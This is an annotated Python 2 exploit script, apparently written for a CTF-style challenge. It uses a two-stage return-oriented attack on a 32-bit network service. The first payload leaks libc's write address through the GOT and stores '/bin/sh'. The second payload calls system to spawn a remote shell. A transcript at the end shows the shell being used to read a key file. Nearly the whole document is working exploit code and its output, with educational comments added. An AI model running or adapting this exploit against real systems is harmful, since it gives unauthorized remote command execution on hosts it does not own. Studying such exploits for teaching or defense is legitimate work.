- import os
- import struct
- from socket import *
- import time
- # Interactive relay over an already-connected socket: each line typed at the
- # local prompt is sent with a trailing newline, then whatever the peer returned
- # within 0.5 s is printed. Python 2 syntax (print statement, raw_input); the
- # body's indentation was lost in the paste.
- def GOT_SHELL(sock):
- command=""
- # The check runs at the top of the loop, so the final 'quit' line is still
- # sent to the peer before the function returns.
- while(command != 'quit'):
- command=raw_input("> ")
- sock.send(command+"\n")
- # Fixed delay instead of waiting for data; output arriving later is not shown.
- time.sleep(0.5)
- # 0x4096 is a hex literal (16534 bytes); 4096 was probably intended.
- print sock.recv(0x4096)
- return
- # 32-bit little-endian pack/unpack helpers; `up` returns a 1-tuple, hence the
- # `[0]` at the call site below.
- p = lambda x : struct.pack("<L", x)
- up = lambda x : struct.unpack("<L", x)
- # Hard-coded target endpoint.
- ip = "192.168.0.103"
- port = 12312 # my server
- s = socket(AF_INET, SOCK_STREAM)
- s.connect((ip, port))
- # Symbol offsets inside the target's libc build; their difference is OFFSET
- # below (0xdfcd0 - 0x41280 == 0x9ea50), so all of these are specific to one
- # libc version.
- #write = dfcd0
- #system = 41280
- OFFSET = 0x9ea50
- # NOTE(review): the fixed 0x0804xxxx addresses imply a 32-bit non-PIE binary;
- # with PIE these values would change per run and the chain would not hold.
- freespace = 0x08049629
- ppppr = 0x080484b5
- write = 0x0804830c
- read = 0x0804832c
- # Filled in from the leak in stage 1; `system` is never reassigned — the
- # derived address is used directly in stage 2.
- write_got = 0
- system = 0
- cmd = "/bin/sh"
- # Unused: the only reference is the commented-out line in stage 2.
- sh = 0x0804867f
- ############################################################################ stage1
- # Stage 1: a chain of two calls. write(1, 0x08049614, 4) leaks the 4-byte GOT
- # entry for write back over the socket; read(0, freespace, len(cmd)) stores the
- # command string in the binary; then control returns to the vulnerable function
- # so stage 2 can be delivered. Leaking a GOT entry reveals where the shared
- # library was loaded; RELRO only makes the GOT read-only and does not prevent
- # this read, whereas PIE (randomizing the binary itself) would.
- payload = ""
- payload += "A"*0x88
- payload += "BBBB"
- payload += p(write) # ret
- payload += p(ppppr+1) # pppr
- payload += p(1) # stdout
- payload += p(0x08049614) # get write_got
- payload += p(4) # size
- payload += p(read) # ret
- payload += p(ppppr+1) # ppr
- payload += p(0)
- payload += p(freespace)
- payload += p(len(cmd))
- payload += p(0x0804841d) # return to vuln function
- print "[*] Sending Stage 1 . . ."
- s.send(payload)
- time.sleep(0.5)
- print "[*] Sending Command "+cmd+" . . ."
- s.send(cmd)
- # Assumes the reply is exactly the 4-byte GOT entry; struct.unpack("<L")
- # raises struct.error for any other length.
- write_got = up(s.recv(2048))[0]
- # Label is misleading: this prints the leaked write address, not system's;
- # system is derived as write_got - OFFSET in stage 2.
- print "[!] system addr : "+hex(write_got)
- ############################################################################ stage2
- # Stage 2: overwrite the saved return address with the libc address computed
- # from the stage-1 leak, followed by a placeholder return address and the
- # argument pointer to the buffer filled in stage 1. The 0x8c pad equals the
- # 0x88 + "BBBB" pad used in stage 1.
- payload = ""
- payload += "A"*0x8c
- payload += p(write_got - OFFSET) # write system
- payload += "AAAA"
- #payload += p(sh)
- payload += p(freespace)
- #####################################################################################
- print "[*] Sending Stage 2 . . ."
- s.send(payload)
- GOT_SHELL(s)
- raw_input("Got Shell?")
- # Sample session transcript kept as a module-level string; it has no effect at
- # runtime.
- """
- C:\Users\Administrator\Desktop\sweetchip>exploit.py
- [*] Sending Stage 1 . . .
- [*] Sending Command /bin/sh . . .
- [!] system addr : 0xb7649cd0L
- [*] Sending Stage 2 . . .
- > whoami
- sweetchip
- > cat /home/sweetchip/key
- This is K3y
- >
- """